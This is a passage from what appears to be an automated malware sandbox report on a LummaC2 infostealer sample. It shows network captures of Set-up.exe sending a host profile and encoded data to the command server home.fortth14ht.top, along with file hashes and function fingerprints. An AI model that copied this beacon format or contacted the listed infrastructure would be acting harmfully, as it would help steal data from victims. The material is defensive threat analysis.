Dec 27, 2024 08:52:45.839365959 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.839376926 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.839385986 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.839483976 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.839494944 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.839503050 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.839514017 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.839523077 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.949877977 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.949894905 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.949904919 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.949923038 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.950066090 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.950076103 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.950086117 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.950095892 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.950104952 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.950115919 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.950124979 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.950844049 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.950855970 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:45.950866938 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:48.014975071 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:48.015136957 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:48.015320063 CET	49737	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:52:48.015475988 CET	49737	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:52:48.135066032 CET	80	49737	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:48.167119026 CET	49738	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:52:48.566445112 CET	80	49738	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:48.566581964 CET	49738	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:52:48.566893101 CET	49738	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:52:48.686378956 CET	80	49738	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:50.005657911 CET	80	49738	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:50.005747080 CET	80	49738	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:50.005822897 CET	49738	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:52:50.006122112 CET	49738	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:52:50.125762939 CET	80	49738	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:50.152632952 CET	49739	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:52:50.272320032 CET	80	49739	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:50.272551060 CET	49739	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:52:50.272840023 CET	49739	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:52:50.392447948 CET	80	49739	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:51.926084042 CET	80	49739	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:51.926378965 CET	80	49739	185.121.15.192	192.168.2.4
Dec 27, 2024 08:52:51.926429987 CET	49739	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:52:51.926471949 CET	49739	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:52:52.048315048 CET	80	49739	185.121.15.192	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 27, 2024 08:52:30.761099100 CET	51947	53	192.168.2.4	1.1.1.1
Dec 27, 2024 08:52:30.761218071 CET	51947	53	192.168.2.4	1.1.1.1
Dec 27, 2024 08:52:30.898489952 CET	53	51947	1.1.1.1	192.168.2.4
Dec 27, 2024 08:52:31.053913116 CET	53	51947	1.1.1.1	192.168.2.4
Dec 27, 2024 08:52:43.919558048 CET	50511	53	192.168.2.4	1.1.1.1
Dec 27, 2024 08:52:43.919614077 CET	50511	53	192.168.2.4	1.1.1.1
Dec 27, 2024 08:52:44.212356091 CET	53	50511	1.1.1.1	192.168.2.4
Dec 27, 2024 08:52:44.227650881 CET	53	50511	1.1.1.1	192.168.2.4
Dec 27, 2024 08:52:48.028467894 CET	51391	53	192.168.2.4	1.1.1.1
Dec 27, 2024 08:52:48.028533936 CET	51391	53	192.168.2.4	1.1.1.1
Dec 27, 2024 08:52:48.166152000 CET	53	51391	1.1.1.1	192.168.2.4
Dec 27, 2024 08:52:48.166172028 CET	53	51391	1.1.1.1	192.168.2.4
Dec 27, 2024 08:52:50.013147116 CET	51393	53	192.168.2.4	1.1.1.1
Dec 27, 2024 08:52:50.013223886 CET	51393	53	192.168.2.4	1.1.1.1
Dec 27, 2024 08:52:50.151480913 CET	53	51393	1.1.1.1	192.168.2.4
Dec 27, 2024 08:52:50.151503086 CET	53	51393	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 27, 2024 08:52:30.761099100 CET	192.168.2.4	1.1.1.1	0xe88d	Standard query (0)	httpbin.org	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:52:30.761218071 CET	192.168.2.4	1.1.1.1	0x7509	Standard query (0)	httpbin.org	28	IN (0x0001)	false
Dec 27, 2024 08:52:43.919558048 CET	192.168.2.4	1.1.1.1	0xaa46	Standard query (0)	home.fortth14ht.top	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:52:43.919614077 CET	192.168.2.4	1.1.1.1	0xacb0	Standard query (0)	home.fortth14ht.top	28	IN (0x0001)	false
Dec 27, 2024 08:52:48.028467894 CET	192.168.2.4	1.1.1.1	0x4ffc	Standard query (0)	home.fortth14ht.top	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:52:48.028533936 CET	192.168.2.4	1.1.1.1	0x6c02	Standard query (0)	home.fortth14ht.top	28	IN (0x0001)	false
Dec 27, 2024 08:52:50.013147116 CET	192.168.2.4	1.1.1.1	0x6dfb	Standard query (0)	home.fortth14ht.top	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:52:50.013223886 CET	192.168.2.4	1.1.1.1	0xc8cc	Standard query (0)	home.fortth14ht.top	28	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 27, 2024 08:52:31.053913116 CET	1.1.1.1	192.168.2.4	0xe88d	No error (0)	httpbin.org	34.226.108.155	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:52:31.053913116 CET	1.1.1.1	192.168.2.4	0xe88d	No error (0)	httpbin.org	3.218.7.103	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:52:44.212356091 CET	1.1.1.1	192.168.2.4	0xaa46	No error (0)	home.fortth14ht.top	185.121.15.192	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:52:48.166152000 CET	1.1.1.1	192.168.2.4	0x4ffc	No error (0)	home.fortth14ht.top	185.121.15.192	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:52:50.151503086 CET	1.1.1.1	192.168.2.4	0x6dfb	No error (0)	home.fortth14ht.top	185.121.15.192	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

httpbin.org

home.fortth14ht.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49737	185.121.15.192	80	6960	C:\Users\user\AppData\Local\Temp\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2024 08:52:44.361288071 CET	12360	OUT	POST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1 Host: home.fortth14ht.top Accept: / Content-Type: application/json Content-Length: 475795 Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 37 31 31 34 35 36 30 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED] Data Ascii: { "ip": "8.46.123.189", "current_time": "8532915458317114560", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 920 }, { "name": "dwm.exe", "pid": 988 }, { "name": "svchost.exe", "pid": 364 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 696 }, { "name": "svchost.exe" [TRUNCATED]
Dec 27, 2024 08:52:44.481105089 CET	4944	OUT	Data Raw: 4e 71 39 71 6c 43 76 43 6e 56 67 37 61 32 6c 46 4f 77 31 5c 2f 75 6e 38 50 35 69 6f 61 74 62 57 59 5a 35 2b 70 5c 2f 2b 75 61 6a 66 37 70 5c 2f 44 2b 59 72 6f 4f 55 68 6f 71 58 61 66 37 78 5c 2f 7a 2b 4e 50 6f 41 69 32 48 32 5c 2f 7a 2b 46 47 77 Data Ascii: Nq9qlCvCnVg7a2lFOw1\/un8P5ioatbWYZ5+p\/+uajf7p\/D+YroOUhoqXaf7x\/z+NPoAi2H2\/z+FGw+3+fwr9Y9N\/4JS\/EPVNP0bUrX4g2tza63pmmanbTWXg2+u4Ik1O0iuoobiVddQW8qeaIGM6wq8q4iLqyFtWT\/AIJJ\/EG1wdQ+IjaepGd9z8OdZjiwOpWV9cWNtoILYb5QRnGVz\/HOI+n79EzC\/WHX8UsVGn
Dec 27, 2024 08:52:44.481134892 CET	4944	OUT	Data Raw: 6e 5c 2f 77 42 4e 66 2b 65 48 5c 2f 58 31 64 5c 2f 68 30 5c 2f 6e 69 70 6f 34 35 47 62 62 2b 37 5a 34 5c 2f 54 50 51 56 44 48 38 30 6e 39 5c 2f 77 41 76 74 4a 36 38 5c 2f 77 42 50 65 73 5c 2f 5a 2b 66 34 66 38 45 30 70 39 66 6c 2b 6f 7a 35 34 34 Data Ascii: n\/wBNf+eH\/X1d\/h0\/nipo45Gbb+7Z4\/TPQVDH80n9\/wAvtJ68\/wBPes\/Z+f4f8E0p9fl+oz5440jR4x+9uf3n\/Pb8fX1+mKM\/xo8kLy\/vfM\/1EAz\/AD78U9pPmZPvxx\/uv9Vx3\/0rPpT5I3XZsT+f2j69vb\/65rM0P3If7x\/D+QptPfr+H9TTK4uR+X9fI\/yfP10\/Yg8R3c\/wX1HRluGa00\/xdq+n3
Dec 27, 2024 08:52:44.481187105 CET	4944	OUT	Data Raw: 50 2b 52 51 61 55 2b 76 79 5c 2f 55 50 4d 5c 2f 38 41 74 76 62 71 66 78 5c 2f 6c 30 5c 2f 47 6f 5a 47 38 7a 72 6e 5c 2f 57 66 35 39 66 65 68 75 69 5c 2f 77 44 58 4c 2b 67 70 6e 7a 74 37 66 70 5c 2f 39 65 67 30 46 6b 33 5a 33 62 4e 6e 5c 2f 41 47 Data Ascii: P+RQaU+vy\/UPM\/8Atvbqfx\/l0\/GoZG8zrn\/Wf59fehui\/wDXL+gpnzt7fp\/9eg0Fk3Z3bNn\/AGyx\/n1qrh8bv4vp3x19evtnvUsnb\/Wd\/wClNkV+U68\/6z\/P6df50HXzvy\/r5lfnO\/Z\/2zx+4\/8A1f5zmoPk+f8A1nf6f5\/pjtmrnk5\/1hDfy\/Sq0kf3t\/3+PT\/P1xQakPoif8s\/9V\/n\/wDV7c
Dec 27, 2024 08:52:44.481273890 CET	2472	OUT	Data Raw: 58 58 6d 31 7a 7a 74 44 68 31 2b 78 38 46 4e 34 46 74 37 43 5c 2f 77 42 51 5c 2f 73 5c 2f 55 49 5a 64 4e 6c 6e 6d 30 76 54 74 55 4b 57 6d 70 62 59 4a 39 73 61 33 44 71 70 79 37 39 72 48 2b 79 6f 5c 2f 32 4c 76 6a 39 61 61 4c 4a 41 2b 6d 61 64 38 Data Ascii: XXm1zztDh1+x8FN4Ft7C\/wBQ\/s\/UIZdNlnm0vTtUKWmpbYJ9sa3Dqpy79rH+yo\/2Lvj9aaLJA+mad8G\/EVhaC2nNzDFbW\/ha3FtElwXlMypatBiQyyMwILuz7q\/pbJMzymrxFwrl+V4fGOu\/GXGZpUzOpSdOljeHsfmOSQyKjNSlCpGrSrYbGYupGeFoxtjsO1Ocn7Oj8XxNlucUeEOMsfmeIwaof8QW\/suGWU6iqV
Dec 27, 2024 08:52:44.519984007 CET	4944	OUT	Data Raw: 4e 65 64 2b 58 39 66 4d 72 73 75 33 48 66 4e 4e 71 78 55 54 39 66 77 5c 2f 71 61 44 55 5a 55 45 6b 66 79 39 63 5c 2f 68 5c 2f 6e 72 30 71 65 69 67 36 43 6c 4a 48 38 76 48 48 31 37 5c 2f 35 36 66 54 39 57 56 4d 5c 2f 33 54 2b 48 38 78 55 4e 42 30 Data Ascii: Ned+X9fMrsu3HfNNqxUT9fw\/qaDUZUEkfy9c\/h\/nr0qeig6ClJH8vHH17\/56fT9WVM\/3T+H8xUNB0EPLH\/PFM\/jT6mpZO34\/0qOg7KfX5EPzN6n+X+GajaNPcJ0\/zn\/PSrVRydvx\/pQOG3z\/AERTki\/uD17f0H+PrzVaRXRj\/H+v+T6Hr61fk\/3P5\/8A6\/X0Apn8P3I\/88\/T8MZ9u9Bv7Ty\/H\/gFD5
Dec 27, 2024 08:52:44.520066977 CET	2472	OUT	Data Raw: 74 58 78 6b 76 37 4f 72 35 70 68 63 62 54 6a 68 36 56 4b 64 56 31 36 47 49 79 58 4e 71 45 73 4f 6f 2b 33 6c 56 79 5c 2f 46 51 68 54 6c 4b 6b 30 66 70 46 62 77 6c 38 53 63 4e 6c 46 54 50 38 56 77 66 6d 2b 46 79 4f 6a 5c 2f 41 47 59 36 75 62 59 71 Data Ascii: tXxkv7Or5phcbTjh6VKdV16GIyXNqEsOo+3lVy\/FQhTlKk0fpFbwl8ScNlFTP8Vwfm+FyOj\/AGY6ubYqFDD5fThnFDJ8TltaWKrV4UVh8Vh+IMmrQxHP7CFPMcNKrUpqT5fqX9nD9qf4j\/s368bjw7cnWfB+pXMcniTwNqVxKNI1QYWN72xcCRtG1xIVVINVtY28zy4ItRttQtIUth734c\/4KZ\/tHeEfGviLU7fW7Dx14D
Dec 27, 2024 08:52:44.600764990 CET	2472	OUT	Data Raw: 30 4b 5c 2f 38 45 51 65 45 76 48 33 37 55 76 77 6a 5c 2f 5a 43 38 4c 33 47 76 2b 4a 37 37 54 62 37 55 5c 2f 69 74 38 59 35 62 65 48 77 5c 2f 63 77 57 47 6c 65 48 50 45 44 6e 77 68 6f 38 74 37 59 78 65 49 74 62 4c 69 35 69 6d 75 6a 61 36 4c 70 65 Data Ascii: 0K\/8EQeEvH37Uvwj\/ZC8L3Gv+J77Tb7U\/it8Y5beHw\/cwWGleHPEDnwho8t7YxeItbLi5imuja6LpeuXlpqFtZ5ul6X4e8S+Kfh\/ongr40fAzxx4X8fa\/wDtC+Ej8VfD2pfGu1+H\/gzxb+y98L0+Mfxg8NeM7TxX8BfDHxMh1HRPh9PZ67p03hj4ceKdL16O9ig0fUby5t9Shsfw7MfB76IGU4\/MsszHizEYbG5PLGQ
Dec 27, 2024 08:52:44.600801945 CET	2472	OUT	Data Raw: 30 39 71 67 6b 5c 2f 65 4b 69 66 66 63 34 38 33 36 5c 2f 6e 36 56 61 5c 2f 6a 50 79 62 2b 6e 72 36 66 35 35 5c 2f 70 55 48 79 46 6b 48 2b 75 38 76 5c 2f 41 4c 59 44 5c 2f 6a 31 5c 2f 4c 2b 66 36 55 48 53 56 68 76 6a 5c 2f 41 4f 57 4f 38 38 5c 2f Data Ascii: 09qgk\/eKiffc4836\/n6Va\/jPyb+nr6f55\/pUHyFkH+u8v\/ALYD\/j1\/L+f6UHSVhvj\/AOWO88\/5\/wA4\/nmHa\/yb0+T\/AD7\/AOf5WZNn9zrn\/lr06dKrfd2Ov3\/NuOnHnfhWntPL8f8AgGsNvn+iIW37vk+T\/rn2\/wAPSnySfu9iJ\/q\/+Wn+fp\/ToOZDv8zZy\/2f+\/8Ah+NVd23+P5xx1\/8AJr\/P
Dec 27, 2024 08:52:44.600837946 CET	2472	OUT	Data Raw: 59 75 78 7a 4c 6e 79 35 4f 50 38 41 4a 6f 58 35 6c 32 62 34 5c 2f 77 44 70 6c 35 6e 58 39 52 5c 2f 78 34 31 70 37 54 79 5c 2f 48 5c 2f 67 41 66 72 39 38 65 74 4d 76 4e 5a 2b 44 5c 2f 41 49 2b 30 79 77 6a 38 36 38 76 4e 44 65 4b 43 4d 5a 2b 64 78 Data Ascii: YuxzLny5OP8AJoX5l2b4\/wDpl5nX9R\/x41p7Ty\/H\/gAfr98etMvNZ+D\/AI+0ywj868vNDeKCMZ+dxc2z4+UMfuqegNeefHH9qP4b\/FD9prxj8YviFo3hmX4PfBr\/AIKWfDz9ovwV4f8Ahr8Ck8Bwftufs26t4jttA8YaF8ZPBvhjwN4H0b4gfGz4O+H9PvvE3w18c\/tH21v4k8V+DfiF8X\/APib4gR3mp6Bpup\/Ts
Dec 27, 2024 08:52:44.600857019 CET	2472	OUT	Data Raw: 74 4e 43 31 4f 66 77 39 4c 38 44 5c 2f 32 73 37 37 77 48 34 6b 2b 4e 57 72 58 58 69 61 33 74 5a 74 4c 38 50 33 50 77 38 6a 2b 48 76 78 44 38 50 32 47 6c 58 56 7a 62 58 5c 2f 69 6d 4c 39 70 72 57 6c 74 6f 37 33 54 74 47 31 69 46 4f 36 38 48 36 50 Data Ascii: tNC1Ofw9L8D\/2s77wH4k+NWrXXia3tZtL8P3Pw8j+HvxD8P2GlXVzbX\/imL9prWlto73TtG1iFO68H6P8AA291v4W+Ktf\/AGp\/hL4a8LR\/sx\/sOfs+fFTw9e\/D\/wDaqu\/ir8Mrr4P\/AAU+F\/wy+LurDSIP2Yr74ceLJ9CuPC+vTeH08KfEbXoNfY6eY\/KguLhrX3qex0+5lWe50+zuJlBCzT20EsqgjBCySRs4B
Dec 27, 2024 08:52:48.014975071 CET	157	IN	HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Fri, 27 Dec 2024 07:52:47 GMT Content-Type: text/html; charset=utf-8 Content-Length: 1 Connection: close Data Raw: 30 Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49738	185.121.15.192	80	6960	C:\Users\user\AppData\Local\Temp\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2024 08:52:48.566893101 CET	99	OUT	GET /nTrmoVgOaovBJpKSuLkP1735210003?argument=0 HTTP/1.1 Host: home.fortth14ht.top Accept: /
Dec 27, 2024 08:52:50.005657911 CET	372	IN	HTTP/1.1 404 NOT FOUND Server: nginx/1.22.1 Date: Fri, 27 Dec 2024 07:52:49 GMT Content-Type: text/html; charset=utf-8 Content-Length: 207 Connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49739	185.121.15.192	80	6960	C:\Users\user\AppData\Local\Temp\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2024 08:52:50.272840023 CET	172	OUT	POST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1 Host: home.fortth14ht.top Accept: / Content-Type: application/json Content-Length: 31 Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
Dec 27, 2024 08:52:51.926084042 CET	372	IN	HTTP/1.1 404 NOT FOUND Server: nginx/1.22.1 Date: Fri, 27 Dec 2024 07:52:51 GMT Content-Type: text/html; charset=utf-8 Content-Length: 207 Connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49735	34.226.108.155	443	6960	C:\Users\user\AppData\Local\Temp\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 07:52:32 UTC	52	OUT	GET /ip HTTP/1.1 Host: httpbin.org Accept: /
2024-12-27 07:52:33 UTC	224	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 07:52:33 GMT Content-Type: application/json Content-Length: 31 Connection: close Server: gunicorn/19.9.0 Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true
2024-12-27 07:52:33 UTC	31	IN	Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a Data Ascii: { "origin": "8.46.123.189"}

Target ID:	0
Start time:	02:52:26
Start date:	27/12/2024
Path:	C:\Users\user\Desktop\3stIhG821a.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\3stIhG821a.exe"
Imagebase:	0x570000
File size:	6'197'248 bytes
MD5 hash:	B50D06FDC5A763244D12F5D2E7C1EE3C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	02:52:29
Start date:	27/12/2024
Path:	C:\Users\user\AppData\Local\Temp\LummaC2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\LummaC2.exe"
Imagebase:	0x9c0000
File size:	299'520 bytes
MD5 hash:	607000C61FCB5A41B8D511B5ED7625D4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 37%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	02:52:30
Start date:	27/12/2024
Path:	C:\Users\user\AppData\Local\Temp\Set-up.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\Set-up.exe"
Imagebase:	0xfc0000
File size:	6'851'208 bytes
MD5 hash:	2A99036C44C996CEDEB2042D389FE23C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 26%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Function 05610A08 Relevance: 1.4, Strings: 1, Instructions: 187COMMON

Download Yara Rule

Strings

8bq, xrefs: 05610C4F

Memory Dump Source

Source File: 00000000.00000002.1779232969.0000000005610000.00000040.00000800.00020000.00000000.sdmp, Offset: 05610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5610000_3stIhG821a.jbxd

Similarity

API ID:
String ID: 8bq
API String ID: 0-187764589
Opcode ID: 087671fbdecad0e13555659b2260b569666bf0fd17daf555ea6cadd992c8aca7
Instruction ID: 5ffe1f029daacbf95f189670b35a90853c9c7564e858a432025d0f8e16447cba
Opcode Fuzzy Hash: 087671fbdecad0e13555659b2260b569666bf0fd17daf555ea6cadd992c8aca7
Instruction Fuzzy Hash: FE61B5347042019FCF18EB79D04DAA9BBB7BB84324B598469D956C73A1DF30EC82CB95

Function 05610590 Relevance: .4, Instructions: 448COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1779232969.0000000005610000.00000040.00000800.00020000.00000000.sdmp, Offset: 05610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5610000_3stIhG821a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f04e6378b7882522a5287e8f894a8f36dc12000fe542eb785c715548b441ea8a
Instruction ID: 89ae6ebeca9baeb7c7adf1c4d295707cf5d5b533bcf98e2c0b12a169402ba317
Opcode Fuzzy Hash: f04e6378b7882522a5287e8f894a8f36dc12000fe542eb785c715548b441ea8a
Instruction Fuzzy Hash: AA516B34A01209CFCB05DFB8E5946DEBBB2FF45308F108969C114AB365EB35994ACB92

Function 05610848 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1779232969.0000000005610000.00000040.00000800.00020000.00000000.sdmp, Offset: 05610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5610000_3stIhG821a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93eb44f139d7f571c3a245cfe4f02435120bbd162922cbfe783021c8fea9954c
Instruction ID: 4547fbce896fe5bbfb940de277b999d72ff83d3beb912263b74afd98953720da
Opcode Fuzzy Hash: 93eb44f139d7f571c3a245cfe4f02435120bbd162922cbfe783021c8fea9954c
Instruction Fuzzy Hash: 83413D34A01209CFCB05DFB8E5946DEBBB2FF45308F508969C114A7364EB35994ACF92

Function 05610C90 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1779232969.0000000005610000.00000040.00000800.00020000.00000000.sdmp, Offset: 05610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5610000_3stIhG821a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8568d7ea660b0219a95916221a51fa43584866879e859db9f3ca41c34994d2c8
Instruction ID: e8e7d0463710959137aa027314797cba55c09c2a283d5c75a6322d0f4e4bfad6
